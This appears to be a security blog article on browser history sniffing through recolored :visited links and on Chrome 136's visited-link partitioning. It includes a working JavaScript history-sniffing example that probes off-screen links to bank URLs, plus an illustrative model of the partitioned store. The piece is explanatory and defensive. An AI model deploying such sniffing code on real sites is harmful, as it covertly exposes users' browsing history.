In April, version 136 of Google Chrome was released, finally addressing a privacy weakness that has been known since 2002 (and that, incidentally, also affects every other major browser). The fix is bad news for unscrupulous marketers, who had been exploiting the weakness for some 15 years. After that ominous build-up, you might be surprised to learn that the culprit is a familiar and seemingly innocuous convenience: links that your browser recolors once you have visited them.
From a bright blue to a shade of purple
The practice of changing the color of links to indicate already-visited pages (by default from blue to purple) was introduced 32 years ago in the NCSA Mosaic browser. The feature was adopted by nearly every browser in the 1990s and was eventually standardized in Cascading Style Sheets (CSS), the language used to style web pages, as the :visited pseudo-class. Such recoloring is the default in every popular browser today.
However, as early as 2002, researchers showed that this feature could be abused: a page places a large number of invisible links to URLs of interest, gives visited links a distinctive style, and uses JavaScript (for example, by reading the computed color of each link) to find out which of them the browser treats as visited. In this way a malicious site could partially reconstruct a user's browsing history, one candidate URL at a time.
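The following is an added example, not code from the original article, showing the 2002-style attack in working form. The candidate URLs, the two colors and the sample "history" are constructed assumptions. The attack itself is the `sniffHistory()` loop plus the DOM probe; the two simulated probes exist so the example also runs outside a browser and shows why the post-2010 mitigation (getComputedStyle() reporting the unvisited style) defeats it.

```javascript
// Added example (not from the original article): the 2002-style :visited
// history sniff. Colors and candidate URLs below are constructed assumptions.
const UNVISITED_COLOR = "rgb(0, 0, 238)";   // classic default link blue
const VISITED_COLOR = "rgb(85, 26, 139)";   // classic default visited purple

// URLs the attacker wants to test; a real attacker would use thousands.
const CANDIDATES = [
  "https://bank.example/",
  "https://otherbank.example/",
  "https://news.example/",
];

// The attack proper: for each candidate, ask a probe what color the browser
// paints a link to that URL, and keep every URL painted in the :visited color.
function sniffHistory(candidates, probe) {
  return candidates.filter((url) => probe(url) === VISITED_COLOR);
}

// Browser-side probe. Installs a stylesheet that gives :visited links a
// distinctive color, injects an off-screen <a> per candidate, and reads back
// its computed color. On an unpatched browser getComputedStyle() reported the
// real :visited color; since the 2010 mitigations it always reports the
// unvisited color, which is exactly what defeats this code.
function makeDomProbe() {
  const style = document.createElement("style");
  style.textContent =
    `a { color: ${UNVISITED_COLOR}; } a:visited { color: ${VISITED_COLOR}; }`;
  document.head.appendChild(style);
  return (url) => {
    const a = document.createElement("a");
    a.href = url;
    a.textContent = "probe";
    a.style.position = "absolute";
    a.style.left = "-9999px";          // keep the link out of sight
    document.body.appendChild(a);
    const color = getComputedStyle(a).color;
    a.remove();
    return color;
  };
}

// Simulated probes so the example runs outside a browser (e.g. under Node).
// `history` is a constructed stand-in for the browser's visited-link table.
function makeLeakyProbe(history) {           // behaves like a pre-2010 browser
  return (url) => (history.has(url) ? VISITED_COLOR : UNVISITED_COLOR);
}
function patchedProbe() {                    // behaves like a post-2010 browser
  return UNVISITED_COLOR;
}

if (typeof document !== "undefined") {
  console.log("visited:", sniffHistory(CANDIDATES, makeDomProbe()));
} else {
  const history = new Set(["https://bank.example/"]);   // constructed sample
  console.log("leaky browser:", sniffHistory(CANDIDATES, makeLeakyProbe(history)));
  console.log("patched browser:", sniffHistory(CANDIDATES, patchedProbe));
}
```

Run in a browser console, the DOM probe reports an empty list on any engine patched since 2010, whatever your real history; the leaky probe shows what the same loop recovered on a 2002-era browser.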
In 2010, researchers found that several significant websites were using this technique to spy on visitors, including YouPorn, TwinCities, and about 480 other popular sites of the day. Platforms such as Tealium and Beencounter were found to be offering history sniffing as a service, and the advertising company Interclick, which used the technique for analytics, was taken to court over it. Interclick prevailed, but the major browsers nonetheless changed how they handle links so that a page can no longer tell whether a link has been visited.
Nevertheless, new web technologies have brought new ways to covertly probe browsing history. A 2018 study described four new techniques for determining whether a link has been visited, two of which worked in every tested browser except the Tor Browser. One of them, CVE-2018-6137 in Chrome, could test up to 3000 links per second. New and increasingly sophisticated approaches to extracting browsing history continue to appear.
Why history theft is perilous
Revealing your browsing history, even in part, poses several risks to users.
Reduced privacy. Knowing which websites you visit (especially those related to health, political affiliation, dating, gambling, or adult content) lets attackers use that information against you: a scam or lure tailored to your situation, whether that means extortion, a fraudulent charity appeal, or the promise of a new medication.
Targeted probing. A site that sniffs history might, for example, systematically check the websites of all the major banks to find out which one you use. That intelligence is valuable both to cybercriminals (who can then serve you a fake payment form for your own bank) and to legitimate companies (who can see which competitors you have looked at).
Profiling and deanonymization. We have often discussed how advertisers and analytics firms track user behavior across the internet through cookies and fingerprinting. Your browsing history is itself a powerful identifier, particularly when combined with other tracking techniques. If an analytics company's script can see which other sites you have visited and when, it effectively functions as a super-cookie.
Defending against browser history theft
Basic protective measures were introduced in 2010 almost simultaneously in Gecko (Firefox) and WebKit (at the time the engine of both Chrome and Safari). Two changes closed the original attack: the styles a page may apply to :visited links were restricted to a few color properties that cannot affect layout, and JavaScript APIs such as getComputedStyle() were made to report the unvisited style regardless of a link's real state. That stopped the simple code that could read a link's state directly.
Around the same time, Firefox 3.5 added an option to disable the recoloring of visited links entirely. The Firefox-based Tor Browser turns recoloring off by default and, on top of that, does not save browsing history at all. This is a strong defense against this whole class of attacks, but at a real cost in convenience.
Unless you are willing to give up that convenience, however, the more advanced attacks can still detect your browsing history.
Google is now trying to change the situation fundamentally: beginning with version 136, Chrome enables visited-link partitioning by default. In essence, a link is only shown as visited if it was clicked from the present site, and when a page tries to probe, it can only "see" clicks that originated from itself. Technically, a visited-link record is keyed not on the link's URL alone but on the triple of link URL, top-level site, and the origin of the frame in which the link was clicked.
The database of visited (clicked) links is therefore kept separately for each such context. For example, suppose bank.com embeds a widget that pulls in information from banksupport.com, and the widget contains a link to centralbank.com. If you click that link, it is marked as visited, but only inside the banksupport.com widget on bank.com. If the same banksupport.com widget appears on any other site, the centralbank.com link is shown as unvisited. (One deliberate exception: a link that points to the site you are currently on is shown as visited regardless of where you originally followed it, so a site learns only about visits to its own pages, which it could see in its own server logs anyway.) Chrome's developers are confident that partitioning is the long-awaited solution.
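To make the partitioning rule concrete, here is an added example that models the partitioned store and walks through the bank.com / banksupport.com / centralbank.com scenario above, next to the old single global table for contrast. This is illustrative code, not Chrome's implementation. Per Chrome's published design the key is (link URL, top-level site, frame origin); `siteOf()` is a simplified stand-in for the real public-suffix-list lookup and assumes the registrable domain is the last two host labels, and the self-links exception is modelled as scoped by site, which is an assumption.

```javascript
// Added example (not Chrome's code): a model of the partitioned visited-link
// store that Chrome 136 enables by default. Per Chrome's published design the
// key is the triple (link URL, top-level site, frame origin). siteOf() is a
// simplified stand-in for a public-suffix-list lookup: it assumes the
// registrable domain is the last two host labels (assumption).

function originOf(url) {
  return new URL(url).origin;
}

function siteOf(url) {
  return new URL(url).hostname.split(".").slice(-2).join(".");
}

// The pre-136 behaviour, for contrast: one global table keyed on the link alone.
class GlobalVisitedLinks {
  constructor() { this.links = new Set(); }
  recordClick(link) { this.links.add(link); }
  isVisited(link) { return this.links.has(link); }
}

class PartitionedVisitedLinks {
  constructor() {
    this.keys = new Set();      // triple-keyed entries
    this.anywhere = new Set();  // links visited in any context, for self-links
  }

  // topLevelUrl is the URL in the address bar; frameUrl is the document that
  // contains the link (equal to topLevelUrl when the link is in the main frame).
  static key(link, topLevelUrl, frameUrl) {
    return `${link}|${siteOf(topLevelUrl)}|${originOf(frameUrl)}`;
  }

  recordClick(link, topLevelUrl, frameUrl) {
    this.keys.add(PartitionedVisitedLinks.key(link, topLevelUrl, frameUrl));
    this.anywhere.add(link);
  }

  isVisited(link, topLevelUrl, frameUrl) {
    // Self-links exception: a link to the current top-level site is styled
    // visited if it was ever visited, whatever the original context
    // (assumption: scoped by site, as modelled here).
    if (siteOf(link) === siteOf(topLevelUrl) && this.anywhere.has(link)) return true;
    return this.keys.has(PartitionedVisitedLinks.key(link, topLevelUrl, frameUrl));
  }
}

// Walk through the article's bank.com / banksupport.com / centralbank.com case.
function demo() {
  const link = "https://centralbank.com/";
  const partitioned = new PartitionedVisitedLinks();
  const legacy = new GlobalVisitedLinks();

  // The user clicks the centralbank.com link inside the banksupport.com widget
  // embedded on bank.com.
  partitioned.recordClick(link, "https://bank.com/accounts", "https://banksupport.com/widget");
  legacy.recordClick(link);

  return {
    // same widget on the same site: shown as visited
    sameContext: partitioned.isVisited(link, "https://bank.com/", "https://banksupport.com/widget"),
    // same widget embedded on another site: unvisited, so attacker.com learns nothing
    otherSite: partitioned.isVisited(link, "https://attacker.com/", "https://banksupport.com/widget"),
    // a centralbank.com link in bank.com's own main frame: different frame origin, unvisited
    mainFrame: partitioned.isVisited(link, "https://bank.com/", "https://bank.com/accounts"),
    // on centralbank.com itself the link is a self-link and shows as visited
    selfLink: partitioned.isVisited(link, "https://centralbank.com/home", "https://centralbank.com/home"),
    // the old global table says "visited" to everyone, attacker.com included
    legacyOtherSite: legacy.isVisited(link),
  };
}

console.log(demo());
```

The `mainFrame` case is the one practitioners tend to miss: partitioning by frame origin, not just by top-level site, means even bank.com's own page cannot see a click that happened inside the embedded widget.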